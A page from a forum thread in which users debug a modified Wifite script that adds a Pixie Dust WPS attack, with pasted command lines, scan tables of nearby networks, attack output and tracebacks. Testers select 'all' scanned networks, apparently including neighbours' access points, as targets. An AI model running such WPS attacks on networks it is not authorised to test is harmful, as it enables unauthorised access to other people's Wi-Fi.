Page 2 of 13 FirstFirst 123412 ... LastLast
Results 11 to 20 of 123

Thread: Wifite including new pixiewps attack

  1. #11
    Senior Member
    Join Date
    Mar 2015
    Posts
    138
    @noruu fixed typo and added added pixie-loop, will be adding a configureable timeout option for pixie attack and will also add option to only attempt pixie attacks(good idea, i like that)

  2. #12
    Senior Member
    Join Date
    Mar 2015
    Posts
    127
    Test parameters:
    Internal wifi card only, quick and dirty.
    Time limited. Netbook with internal wifi card, so all but one targets where to far away.
    The one that was close enough for pixie/reaver attack, the script errored during pixie attack.

    Observations:
    The script handled configurable timeout well. (targets to far anyway)

    When crtl C pressed the script moved on to next target well.

    Need the timer for pixie attack, like timer for wps pin attack.
    (cursor just hangs during pixie. countdown if possible)

    Todo:
    I will test script for fails, against more targets and with a stronger external usb wifi card and then post later.

    Code:
    root***:~/wifite-mod-pixiewps-master# ./wifitemod -wps -pixiet 90
    
      .;'                     `;,    
     .;'  ,;'             `;,  `;,   WiFite v2 (r85)
    .;'  ,;'  ,;'     `;,  `;,  `;,  
    ::   ::   :   ( )   :   ::   ::  automated wireless auditor
    ':.  ':.  ':. /_\ ,:'  ,:'  ,:'  
     ':.  ':.    /___\    ,:'  ,:'   designed for Linux
      ':.       /_____\      ,:'     
               /       \             
    
    modified by aanarchyy(aanarchyy@gmail.com)
    Credits to wiire,DataHead,soxrok2212,nxxxu
    
     [+] targeting WPS-enabled networks
     [+] pixiewps attack timeout set to 90 seconds
    
     [+] scanning for wireless devices...
     [+] initializing scan (mon0), updates at 5 sec intervals, CTRL+C when ready.
     [0:00:04] scanning wireless networks. 0 targets and 0 clients found   
    
     [+] scanning (mon0), updates at 5 sec intervals, CTRL+C when ready.
    
       NUM ESSID                 CH  ENCR  POWER  WPS?  CLIENT
       --- --------------------  --  ----  -----  ----  ------
        1  DG167****              1  WPA2  33db   Locked 
        2  TDS                    6  WPA2  17db   wps 
    
     [0:00:25] scanning wireless networks. 2 targets and 2 clients found   
    
     [+] scanning (mon0), updates at 5 sec intervals, CTRL+C when ready.
    
       NUM ESSID                 CH  ENCR  POWER  WPS?  CLIENT
       --- --------------------  --  ----  -----  ----  ------
        1  DG167****              1  WPA2  34db   Locked 
        2  TDS                    6  WPA2  24db   wps 
        3  TG167****              1  WPA2  21db   wps 
        4  FiOS-S****            1  WPA2  19db   wps 
        5  HAL9000                6  WPA2  15db   wps 
    
     [0:00:48] scanning wireless networks. 5 targets and 9 clients found   
    
     [+] scanning (mon0), updates at 5 sec intervals, CTRL+C when ready.
    
       NUM ESSID                 CH  ENCR  POWER  WPS?  CLIENT
       --- --------------------  --  ----  -----  ----  ------
        1  DG167****              1  WPA2  34db   Locked 
        2  TDS                    6  WPA2  23db   wps 
        3  TG167****              1  WPA2  21db   wps 
        4  FiOS-S****             1  WPA2  16db   wps 
        5  HAL9000                6  WPA2  15db   wps 
    
     [0:01:11] scanning wireless networks. 5 targets and 13 clients found   
     [+] checking for WPS compatibility... done
     [+] removed 49 non-WPS-enabled targets
    
       NUM ESSID                 CH  ENCR  POWER  WPS?  CLIENT
       --- --------------------  --  ----  -----  ----  ------
        1  DG167****              1  WPA2  34db   Locked 
        2  TDS                    6  WPA2  24db   wps 
        3  TG167****              1  WPA2  20db   wps 
        4  DG167****              1  WPA2  19db   wps 
        5  FiOS-S****             1  WPA2  17db   wps 
        6  HAL9000                6  WPA2  15db   wps 
    
     [+] select target numbers (1-6) separated by commas, or 'all': all
    
     [+] 6 targets selected.
    
     [0:00:00] initializing PixieWPS attack on DG16**** (00:00:00:00:73:90)
    
     [!] unable to complete successful try in 90 seconds
     [+] skipping pixiewps on DG167****
    
     [+] Pixiewps attack failed!
    
     [0:00:00] initializing WPS PIN attack on DG167**** (00:00:00:00:73:90)
    ^C0:00:12] WPS attack, 0/0 success/ttl, 
     (^C) WPS brute-force attack interrupted
    
     [+] 5 targets remain
     [+] what do you want to do?
         [c]ontinue attacking targets
         [e]xit completely
     [+] please make a selection (c, or e): c
    
     [0:00:00] initializing PixieWPS attack on TDS (00:00:00:00:1B:C6)
    
     [!] unable to complete successful try in 90 seconds
     [+] skipping pixiewps on TDS
    
     [+] Pixiewps attack failed!
    
     [0:00:00] initializing WPS PIN attack on TDS (00:00:00:00:1B:C6)
    ^C0:00:25] WPS attack, 0/0 success/ttl, 
     (^C) WPS brute-force attack interrupted
    
     [+] 4 targets remain
     [+] what do you want to do?
         [c]ontinue attacking targets
         [e]xit completely
     [+] please make a selection (c, or e): c
    
     [0:00:00] initializing PixieWPS attack on TG167**** (00:00:00:00:8F:20)
    
     [!] unable to complete successful try in 90 seconds
     [+] skipping pixiewps on TG167****
    
     [+] Pixiewps attack failed!
    
     [0:00:00] initializing WPS PIN attack on TG167**** (00:00:00:00:8F:20)
    ^C0:00:22] WPS attack, 0/0 success/ttl, 
     (^C) WPS brute-force attack interrupted
    
     [+] 3 targets remain
     [+] what do you want to do?
         [c]ontinue attacking targets
         [e]xit completely
     [+] please make a selection (c, or e): c
    
     [0:00:00] initializing PixieWPS attack on DG167**** (00:00:00:00:C4:60)
    
     [!] unable to complete successful try in 90 seconds
     [+] skipping pixiewps on DG167****
    
     [+] Pixiewps attack failed!
    
     [0:00:00] initializing WPS PIN attack on DG167**** (00:00:00:00:C4:60)
    ^C0:00:08] WPS attack, 0/0 success/ttl, 
     (^C) WPS brute-force attack interrupted
    
     [+] 2 targets remain
     [+] what do you want to do?
         [c]ontinue attacking targets
         [e]xit completely
     [+] please make a selection (c, or e): c
    
     [0:00:00] initializing PixieWPS attack on FiOS-S**** (00:00:00:00:EC:C2)
     [+] E-Nonce found
     [+] PKE hash found
     [+] PKR hash found
     [+] E-Hash1 found
     [+] E-Hash2 found
    Traceback (most recent call last):
      File "./wifitemod", line 3134, in <module>
        main()
      File "./wifitemod", line 321, in main
        need_handshake = not wps_attack(iface, t)
      File "./wifitemod", line 2931, in wps_attack
        os.remove(temp + "reaver_err.out")
    OSError: [Errno 2] No such file or directory: '/tmp/wifite0jkPaB/reaver_err.out'
    root@****:~/wifite-mod-pixiewps-master#
    Great progress !!

  3. #13
    Senior Member
    Join Date
    Mar 2015
    Posts
    127
    Also on little netbook that I havent upgraded aircrack-ng suite, interface creation/usage perfect.

  4. #14
    Senior Member
    Join Date
    Mar 2015
    Posts
    138
    Updated!
    Added -pixiet <sec> to configure pixiewps timeout
    Added -ponly to set to only attack using pixiewps
    Fixed ctrl^c issue

  5. #15
    Senior Member
    Join Date
    Mar 2015
    Posts
    127
    Code:
    root@kali:~/wifite-mod-pixiewps-master# ./wifitemod -ponly -pixiet 45
    
      .;'                     `;,    
     .;'  ,;'             `;,  `;,   WiFite v2 (r86)
    .;'  ,;'  ,;'     `;,  `;,  `;,  
    ::   ::   :   ( )   :   ::   ::  automated wireless auditor
    ':.  ':.  ':. /_\ ,:'  ,:'  ,:'  
     ':.  ':.    /___\    ,:'  ,:'   designed for Linux
      ':.       /_____\      ,:'     
               /       \             
    
    modified by aanarchyy(aanarchyy@gmail.com)
    Credits to wiire,DataHead,soxrok2212,nxxxu
    
     [+] Pixiewps attack only enabled
     [+] pixie attack timeout set to 45 seconds
    
     [+] scanning for wireless devices...
     [+] initializing scan (mon0), updates at 5 sec intervals, CTRL+C when ready.
     [0:00:04] scanning wireless networks. 0 targets and 0 clients found   
    
     [+] scanning (mon0), updates at 5 sec intervals, CTRL+C when ready.
    
       NUM ESSID                 CH  ENCR  POWER  WPS?  CLIENT
       --- --------------------  --  ----  -----  ----  ------
        1  \x00\x00\x001000   6  WPA2  65db   wps 
        2  b0c554a1000           1  WPA2  64db   wps 
        3  DVW32011000             1  WPA2  56db   wps 
        4  atlantis201000       10  WPA2  53db   wps 
        5  WileyR1000            10  WPA2  52db   wps 
        6  DVW321000             1  WPA2  51db   wps 
        7  133 1000  1000             6  WPA2  51db   Locked 
        8  Onyx1100023                1  WPA2  50db   wps 
        9  TommyA1000            6  WPA2  50db   wps 
       10  Kirin1000              1  WPA2  49db   wps 
       11  DG16701000             11  WPA2  48db   wps 
       12  We hear y1000  6  WPA2  48db   wps 
       13  \x00\x00\1000       11  WPA2  47db   wps 
       14  DG11000             11  WPA2  46db   wps 
       15  DG11000              1  WPA2  45db   Locked 
       16  Tuppy Gl1000          6  WPA2  45db   Locked 
       17  lind1000          11  WPA2  44db   wps 
       18  DG11000              1  WPA2  40db   Locked 
    
     [0:00:06] scanning wireless networks. 18 targets and 3 clients found   
    
     [+] scanning (mon0), updates at 5 sec intervals, CTRL+C when ready.
    
       NUM ESSID                 CH  ENCR  POWER  WPS?  CLIENT
       --- --------------------  --  ----  -----  ----  ------
        1  \x00\x00\x001000   6  WPA2  65db   wps 
        2  b0c554a1000           1  WPA2  64db   wps 
        3  DVW32011000             1  WPA2  56db   wps 
        4  atlantis201000       10  WPA2  53db   wps 
        5  WileyR1000            10  WPA2  52db   wps 
        6  DVW321000             1  WPA2  51db   wps 
        7  133 1000  1000             6  WPA2  51db   Locked 
        8  Onyx1100023                1  WPA2  50db   wps 
        9  TommyA1000            6  WPA2  50db   wps 
       10  Kirin1000              1  WPA2  49db   wps 
       11  DG16701000             11  WPA2  48db   wps 
       12  We hear y1000  6  WPA2  48db   wps 
       13  \x00\x00\1000       11  WPA2  47db   wps 
       14  DG11000             11  WPA2  46db   wps 
       15  DG11000              1  WPA2  45db   Locked 
       16  Tuppy Gl1000          6  WPA2  45db   Locked 
       17  lind1000          11  WPA2  44db   wps 
       18  DG11000              1  WPA2  40db   Locked 
    
     [0:00:21] scanning wireless networks. 18 targets and 3 clients found   
    
     [+] scanning (mon0), updates at 5 sec intervals, CTRL+C when ready.
    
       NUM ESSID                 CH  ENCR  POWER  WPS?  CLIENT
       --- --------------------  --  ----  -----  ----  ------
        1  \x00\x00\x001000   6  WPA2  65db   wps 
        2  b0c554a1000           1  WPA2  64db   wps 
        3  DVW32011000             1  WPA2  56db   wps 
        4  atlantis201000       10  WPA2  53db   wps 
        5  WileyR1000            10  WPA2  52db   wps 
        6  DVW321000             1  WPA2  51db   wps 
        7  133 1000  1000             6  WPA2  51db   Locked 
        8  Onyx1100023                1  WPA2  50db   wps 
        9  TommyA1000            6  WPA2  50db   wps 
       10  Kirin1000              1  WPA2  49db   wps 
       11  DG16701000             11  WPA2  48db   wps 
       12  We hear y1000  6  WPA2  48db   wps 
       13  \x00\x00\1000       11  WPA2  47db   wps 
       14  DG11000             11  WPA2  46db   wps 
       15  DG11000              1  WPA2  45db   Locked 
       16  Tuppy Gl1000          6  WPA2  45db   Locked 
       17  lind1000          11  WPA2  44db   wps 
       18  DG11000              1  WPA2  40db   Locked 
       19  linda1000           11  WPA2  45db   wps 
       20  \x00\x00\x00\x00\...  11  WPA2  45db   wps 
       21  ZOOM                   6  WPA2  44db   wps 
       22  DG1671000              1  WPA2  41db   Locked 
       23  McPo1000               6  WPA2  40db   wps 
       24  DG1671000              1  WPA2  40db   Locked 
    
     [0:00:29] scanning wireless networks. 24 targets and 14 clients found   
     [+] checking for WPS compatibility... done
     [+] removed 35 non-WPS-enabled target
    
    
       NUM ESSID                 CH  ENCR  POWER  WPS?  CLIENT
       --- --------------------  --  ----  -----  ----  ------
        1  \x00\x00\x001000   6  WPA2  65db   wps 
        2  b0c554a1000           1  WPA2  64db   wps 
        3  DVW32011000             1  WPA2  56db   wps 
        4  atlantis201000       10  WPA2  53db   wps 
        5  WileyR1000            10  WPA2  52db   wps 
        6  DVW321000             1  WPA2  51db   wps 
        7  133 1000  1000             6  WPA2  51db   Locked 
        8  Onyx1100023                1  WPA2  50db   wps 
        9  TommyA1000            6  WPA2  50db   wps 
       10  Kirin1000              1  WPA2  49db   wps 
       11  DG16701000             11  WPA2  48db   wps 
       12  We hear y1000  6  WPA2  48db   wps 
       13  \x00\x00\1000       11  WPA2  47db   wps 
       14  DG11000             11  WPA2  46db   wps 
       15  DG11000              1  WPA2  45db   Locked 
       16  Tuppy Gl1000          6  WPA2  45db   Locked 
       17  lind1000          11  WPA2  44db   wps 
       18  DG11000              1  WPA2  40db   Locked 
       19  linda1000           11  WPA2  45db   wps 
       20  \x00\x00\x00\x00\...  11  WPA2  45db   wps 
       21  ZOOM                   6  WPA2  44db   wps 
       22  DG1671000              1  WPA2  41db   Locked 
       23  McPo1000               6  WPA2  40db   wps 
       24  DG1671000              1  WPA2  40db   Locked 
       25  McP1000               6  WPA2  42db   wps   client
       26  DG1671000              1  WPA2  42db   Locked 
       27  DG1671000              1  WPA2  41db   Locked 
       28  TG1671000              6  WPA2  40db   wps 
       29  THWL9                  1  WPA2  38db   wps 
    
     [+] select target numbers (1-29) separated by commas, or 'all': all
    
     [+] 29 targets selected.
    
     [0:00:00] initializing PixieWPS attack on \x00\x00\x00\x00\x00\x 1000:79:0F)
    
     [!] unable to complete successful try in 45 seconds
     [+] skipping pixiewps on \x00\x00\x00\x00\x00\x
    
     [!] unable to complete successful try in 45 seconds
     [+] skipping pixiewps on \x00\x00\x00\x00\x00\x
    
     [!] unable to complete successful try in 45 seconds
     [+] skipping pixiewps on \x00\x00\x00\x00\x00\x
    
     [!] unable to complete successful try in 45 seconds
     [+] skipping pixiewps on \x00\x00\x00\x00\x00\x
    
     [!] unable to complete successful try in 45 seconds
     [+] skipping pixiewps on \x00\x00\x00\x00\x00\x
    
     [!] unable to complete successful try in 45 seconds
     [+] skipping pixiewps on \x00\x00\x00\x00\x00\x
    
     [!] unable to complete successful try in 45 seconds
     [+] skipping pixiewps on \x00\x00\x00\x00\x00\x
    
     [!] unable to complete successful try in 45 seconds
     [+] skipping pixiewps on \x00\x00\x00\x00\x00\x
    ^C
     (^C) WPS brute-force attack interrupted
    
     [+] 28 targets remain
     [+] what do you want to do?
         [c]ontinue attacking targets
         [e]xit completely
     [+] please make a selection (c, or e): c
    
    
     (^C) WPS brute-force attack interrupted
    
     [+] 27 targets remain
     [+] what do you want to do?
         [c]ontinue attacking targets
         [e]xit completely
     [+] please make a selection (c, or e): c
    
     [+] Pixiewps attack failed!
    
     [0:00:00] initializing PixieWPS attack on b0c554a1000 (1000:A7:86)
    
     [!] unable to complete successful try in 45 seconds
     [+] skipping pixiewps on b0c554a1000
    
     [!] unable to complete successful try in 45 seconds
     [+] skipping pixiewps on b0c554a1000
    
     [!] unable to complete successful try in 45 seconds
     [+] skipping pixiewps on b0c554a1000
    
     [!] unable to complete successful try in 45 seconds
     [+] skipping pixiewps on b0c554a1000
    
     [!] unable to complete successful try in 45 seconds
     [+] skipping pixiewps on b0c554a1000
    ^C
     (^C) WPS brute-force attack interrupted
    
     [+] 26 targets remain
     [+] what do you want to do?
         [c]ontinue attacking targets
         [e]xit completely
     [+] please make a selection (c, or e): ^C
     (^C) WPS brute-force attack interrupted
    
     [+] 26 targets remain
     [+] what do you want to do?
         [c]ontinue attacking targets
         [e]xit completely
     [+] please make a selection (c, or e): ^CTraceback (most recent call last):
      File "./wifitemod", line 3150, in <module>
        if attack_interrupted_prompt():
      File "./wifitemod", line 1801, in attack_interrupted_prompt
        ri = raw_input(GR+' [+]'+W+' please make a selection (%s): ' % options)
    KeyboardInterrupt
    Stuck in loop after pixie attack fails

  6. #16
    Senior Member
    Join Date
    Mar 2015
    Posts
    127
    if ./wifite -pixiet (no time given)

    script handles ./wifite -pixiet<null> nicely.

    Also in previous version -ponly had no acknolegdement of being set to active, this version says its active.
    Last edited by nuroo; 2015-04-21 at 01:51 AM.

  7. #17
    Senior Member
    Join Date
    Mar 2015
    Posts
    138
    Quote Originally Posted by nuroo View Post
    [CODE]

    Stuck in loop after pixie attack fails
    Yeah, just noticed that also, gimme a min to fix, just had it fixed then testbed crashed so i gotta remember what i did... :-/

    Edit: Should be fixed now. I want to thank you again for helping me test this
    Last edited by aanarchyy; 2015-04-21 at 02:03 AM.

  8. #18
    Senior Member
    Join Date
    Mar 2015
    Posts
    127
    ./wifite -ponly -pixiet 75 -pow 35

    Worked no errors. 8 targets. Ctrl'C on a few I knew wouldn't crack, no crash. -NICE

    No successful pixie attack though. Gonna increase timeout test pixie attack portion.

  9. #19
    Senior Member
    Join Date
    Mar 2015
    Posts
    127
    When given enough info for successful attack against known vulnerable AP:
    [0:00:00] initializing PixieWPS attack on DG167000 (0000000:27:80)
    [+] E-Nonce found
    [+] PKE hash found
    [+] PKR hash found
    [+] Authkey found
    [+] E-Hash1 found
    [+] E-Hash2 found
    script seems to stand still, no error but no output

    Is that because -P option used in reaver? If -P option loop used, so no M4, so no wps lockout?

    If so Then do you feed successful results to offline pixie attack to obtain pin? the new reaver to test pin?

  10. #20
    Senior Member
    Join Date
    Jul 2013
    Location
    United States
    Posts
    515
    Quote Originally Posted by nuroo View Post
    When given enough info for successful attack against known vulnerable AP:
    [0:00:00] initializing PixieWPS attack on DG167000 (0000000:27:80)
    [+] E-Nonce found
    [+] PKE hash found
    [+] PKR hash found
    [+] Authkey found
    [+] E-Hash1 found
    [+] E-Hash2 found
    script seems to stand still, no error but no output

    Is that because -P option used in reaver? If -P option loop used, so no M4, so no wps lockout?

    If so Then do you feed successful results to offline pixie attack to obtain pin? the new reaver to test pin?
    Yeah, the -P switch will stop M4 from being sent at all. Just run reaver after and supply the correct pin.

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •